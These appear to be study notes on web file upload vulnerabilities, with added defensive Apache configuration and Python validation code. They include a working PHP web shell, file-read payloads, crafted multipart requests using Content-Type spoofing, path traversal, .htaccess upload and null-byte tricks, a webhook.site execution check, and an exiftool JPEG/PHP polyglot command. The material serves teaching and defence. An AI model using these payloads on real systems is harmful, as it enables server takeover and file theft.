File Upload

File upload vulnerabilities arise when a web server lets users upload files to its filesystem without sufficiently validating things like:

- Name
- Content
- Size
- Type

Leak in Content-Type response

The Content-Type response header may provide clues about what kind of file the server believes it has served. If the application code hasn't set this header explicitly, it typically reflects the server's file extension to MIME type mapping. A quick check: upload a harmless file, request it back and read the Content-Type of the response; it tells you how the server will treat an upload with that extension.

Basic php

Read a local file:

<?php echo file_get_contents('/home/user/whatever'); ?>

Run a command taken from the query string (a minimal web shell):

<?php echo system($_GET['command']); ?>

==> GET /example/exploit.php?command=whoami HTTP/1.1

Out-of-band check that the uploaded file is really executed server-side: if it runs, the server fetches a URL you control and the hit shows up in the webhook log.

<?php echo file_get_contents("https://webhook.site/5c9c4652-1d78-490f-aede-cb4820ab229f"); ?>

Content-Type multipart/form-data

The Content-Type of each part is set by the client, so a server that only checks this header is bypassed by declaring the PHP file as image/jpeg:

------geckoformboundaryb1c53164ae34b296ed4c82a1c3d3e0d2
Content-Disposition: form-data; name="avatar"; filename="discord.php"
Content-Type: image/jpeg

<?php echo file_get_contents('/home/user/password'); ?>

Path traversal in form

The filename is client-controlled too. If the server joins it to the upload directory without normalising it, a traversal sequence writes the file somewhere else, for example into a directory where PHP is executed. It is URL-encoded (..%2f) because a server that strips a literal ../ may still decode %2f afterwards:

Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/user/password'); ?>

Server doesn't execute php

Servers don't execute PHP files by default. There are multiple ways to enable the execution of PHP files depending on the server technology. For example, in an Apache server, to run PHP in every directory, you need to add the following lines to /etc/apache2/apache2.conf:

LoadModule php_module /usr/lib/apache2/modules/libphp.so
AddType application/x-httpd-php .php

The server can also be configured to apply specific rules to individual folders. This is done in a .htaccess file with these lines (they only take effect if the directory's AllowOverride setting permits FileInfo directives):

AddHandler application/x-httpd-php .php .php5
AddType application/x-httpd-php .php .php5

Example of a manipulated form part where I upload a .htaccess file so that exploit.php5 is executed as PHP. The filename carries a %00 null byte followed by .jpg to get past an extension check that only looks at the end of the name:

Content-Disposition: form-data; name="avatar"; filename=".htaccess%00.jpg"
Content-Type: image/jpeg

AddHandler application/x-httpd-php .php .php5
AddType application/x-httpd-php .php .php5
------geckoformboundary660c86820a5865845b8db39c38c19ec
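The defensive counterpart, as an added example that is not from the original notes: an Apache <Directory> block for the folder that receives uploads, written so that neither a server-wide AddType nor an uploaded .htaccess can turn an upload into executable code. The directory path is an assumption; php_admin_flag is only valid when mod_php is loaded (with PHP-FPM the equivalent is simply not routing this directory to the FPM handler), and the Header line needs mod_headers.

```apache
# Added example, not from the original page. The path is an assumption.
<Directory "/var/www/html/uploads">
    # An uploaded .htaccess is ignored: no AddHandler/AddType overrides here
    AllowOverride None

    # mod_php only: switch the engine off for this directory even though
    # .php is mapped to the PHP handler server-wide
    php_admin_flag engine off

    # Undo the server-wide mappings for the extensions used in the tricks above
    RemoveHandler .php .php5 .phtml .phar
    RemoveType .php .php5 .phtml .phar

    # Refuse to serve anything that looks like server-side code at all
    <FilesMatch "\.(php[0-9]?|phtml|phar|shtml|htaccess)$">
        Require all denied
    </FilesMatch>

    # No CGI and no server-side includes, so .shtml is inert here
    Options -ExecCGI -Includes

    # Stop browsers from sniffing an upload into a script (needs mod_headers)
    Header set X-Content-Type-Options "nosniff"
</Directory>
```

AllowOverride None is the line that matters most for the .htaccess upload above: with it in place the uploaded file is just another static file, whatever directives it contains.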

Example of directory-specific configuration in an IIS server, located in web.config. An uploaded web.config can add MIME mappings, so the server starts serving a file type it would otherwise refuse (here .json):

<staticContent>
    <mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>

Obfuscating

Ways to get a PHP file past a check on the extension:

.php5, .shtml            lesser-known extensions that may still be mapped to a handler (.shtml is only executed where server-side includes are enabled)
exploit.php.jpg          double extension: a check that only looks at the last extension sees .jpg, while Apache with the AddHandler line above still applies the PHP handler
exploit.PhP              case variation, against a case-sensitive blocklist
exploit.php;.jpg         semicolon truncation: the validation code sees .jpg, a lower-level layer that stops at ; stores exploit.php
exploit.php%00.jpg       null byte truncation, same idea with a URL-encoded null byte
exploit.p.phphp          when the server strips the string ".php" once, what remains is exploit.php
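The list above run through code, as an added example that is not part of the original notes: each filename is fed to a weak blocklist check and to a strict allowlist check, both written here in Python as hypothetical stand-ins for a real upload handler. The function names, the allowlist, the once-only sanitiser and the random storage name are my assumptions, not anything the page describes.

```python
"""Added example (not from the original page): the filename tricks above run
against a weak extension check and a strict one. Both checks are hypothetical
stand-ins for an upload handler, written for this note."""
import posixpath
import secrets

# Constructed inputs: the page's obfuscations, plus the .htaccess and traversal
# names from the earlier form examples, as they look once URL-decoded.
PAYLOADS = [
    "exploit.php5",
    "exploit.shtml",
    "exploit.php.jpg",
    "exploit.PhP",
    "exploit.php;.jpg",
    "exploit.php\x00.jpg",   # "exploit.php%00.jpg" after decoding
    "exploit.p.phphp",
    ".htaccess\x00.jpg",     # ".htaccess%00.jpg" after decoding
    "../exploit.php",        # "..%2fexploit.php" after decoding
    "avatar.jpg",            # the one legitimate upload
]

BLOCKED = {"php", "phtml", "phar"}            # what the weak check knows about
ALLOWED = {"jpg", "jpeg", "png", "gif"}       # what the strict check accepts


def weak_filter(filename: str) -> bool:
    """Blocklist on the text after the last dot, case-sensitive.
    Returns True when the upload would be accepted."""
    ext = filename.rsplit(".", 1)[-1]
    return ext not in BLOCKED


def weak_sanitize(filename: str) -> str:
    """Strip the forbidden extension once and store whatever is left."""
    return filename.replace(".php", "", 1)


def strict_filter(filename: str) -> bool:
    """Allowlist check: a bare basename of the form stem.ext and nothing else."""
    if not filename or any(ord(c) < 0x20 for c in filename):
        return False                      # NUL / control bytes (.php%00.jpg)
    if posixpath.basename(filename) != filename or "\\" in filename:
        return False                      # traversal (..%2fexploit.php)
    if ";" in filename:
        return False                      # exploit.php;.jpg
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:   # .htaccess, exploit.php.jpg, .p.phphp
        return False
    return parts[1].lower() in ALLOWED    # case-folded, so exploit.PhP fails


def stored_name(filename: str) -> str:
    """Only call after strict_filter passed. Never keep the client's name:
    random stem, extension taken from the (already allowlisted) input."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


def evaluate(payloads=PAYLOADS) -> dict:
    """Map each filename to (accepted by weak check, accepted by strict check)."""
    return {p: (weak_filter(p), strict_filter(p)) for p in payloads}


if __name__ == "__main__":
    for name, (weak, strict) in evaluate().items():
        print(f"{name!r:26} weak={weak!s:5} strict={strict}")
    print("weak_sanitize('exploit.p.phphp') ->", weak_sanitize("exploit.p.phphp"))
```

Every name in the list except the traversal one sails through weak_filter, and the sanitiser turns exploit.p.phphp into exploit.php on disk; strict_filter only lets avatar.jpg through, and stored_name then throws the client's name away entirely.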

Intrinsic properties of files

Stronger checks look at the file's content rather than its name, typically the magic bytes at the start of the file, which must match the declared type.

JPG :

  • Files always begin with bytes FF D8 FF

Polyglot files

We can create polyglot files with tools like exiftool: the file stays a valid image for content checks (magic bytes, dimensions), but its metadata carries code of another type, which runs if the server hands the file to the PHP interpreter.

For example, malicious php code in the comment field of a .jpg:

.\exiftool.exe -Comment="<?php echo 'START ' . file_get_contents('/home/user/password') . ' END'; ?>" C:\Users\past3ll3\Documents\portswigger\jpg.jpg -o polyglot.php

The output is written with a .php extension, so it still relies on the upload being stored under a name (or in a directory) that the server executes as PHP; the magic bytes only get it past the content check. The START and END markers make the leaked file contents easy to spot inside the binary image data the server sends back.

(nice poc: https://poeticalhacking.net/blog/posts/turning-a-jpg-into-a-reverse-shell-with-exiftool/)
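The polyglot built by hand, as an added example that is not from the original page or the linked post: a minimal JPEG whose COM segment (the same 0xFFFE segment exiftool's -Comment option writes) holds the page's PHP payload. The magic-byte check from "Intrinsic properties of files" passes it, a small segment walker finds the payload, and a metadata-stripping pass, the defence, removes it. The image contains no actual picture data, and the function names are assumptions made for this note.

```python
"""Added example: hand-built JPEG/PHP polyglot, the magic-byte check it passes,
and the metadata strip that defeats it. Not from the original page; the image
is constructed (no picture data) and the function names are assumptions."""
import struct
from typing import Iterator, Optional, Tuple

SOI, EOI, COM = b"\xff\xd8", b"\xff\xd9", b"\xff\xfe"
# The PHP payload from the exiftool command above.
PHP_PAYLOAD = (b"<?php echo 'START ' . file_get_contents('/home/user/password')"
               b" . ' END'; ?>")


def build_polyglot(comment: bytes) -> bytes:
    """SOI, one COM segment carrying the comment, EOI. exiftool -Comment writes
    the same COM (0xFFFE) segment into a real image, which would also carry
    APP0/DQT/SOF/SOS segments and scan data between the comment and EOI."""
    length = len(comment) + 2               # the length field counts itself
    if length > 0xFFFF:
        raise ValueError("comment does not fit in one COM segment")
    return SOI + COM + struct.pack(">H", length) + comment + EOI


def is_jpeg_by_magic(data: bytes) -> bool:
    """The content check from 'Intrinsic properties of files': FF D8 FF."""
    return data[:3] == b"\xff\xd8\xff"


def jpeg_segments(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (marker, payload) for each marker segment before SOS/EOI."""
    if not data.startswith(SOI):
        raise ValueError("missing SOI, not a JPEG")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI, or SOS: scan data follows
            return
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def find_php(data: bytes) -> Optional[bytes]:
    """First COM payload that contains a PHP open tag, or None."""
    for marker, payload in jpeg_segments(data):
        if marker == 0xFE and b"<?php" in payload:
            return payload
    return None


def strip_metadata(data: bytes) -> bytes:
    """Defence: drop COM and APPn segments before storing the upload, so text
    smuggled in metadata never reaches disk. Production code should re-encode
    the image with an image library rather than editing segments by hand."""
    out = bytearray(SOI)
    pos = 2
    while pos + 2 <= len(data):
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):          # keep scan data and EOI verbatim
            out += data[pos:]
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if marker != 0xFE and not 0xE0 <= marker <= 0xEF:
            out += data[pos:pos + 2 + length]
        pos += 2 + length
    return bytes(out)


if __name__ == "__main__":
    poly = build_polyglot(PHP_PAYLOAD)
    print("magic check passes:", is_jpeg_by_magic(poly))
    print("payload found:", find_php(poly))
    print("after strip:", strip_metadata(poly).hex())
```

The point of the walker is that the magic-byte check and the segment parser disagree: the first three bytes say "image", while a few bytes further on the COM segment carries a complete PHP script. A server that only checks magic bytes stores the script; one that re-encodes or strips metadata does not.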
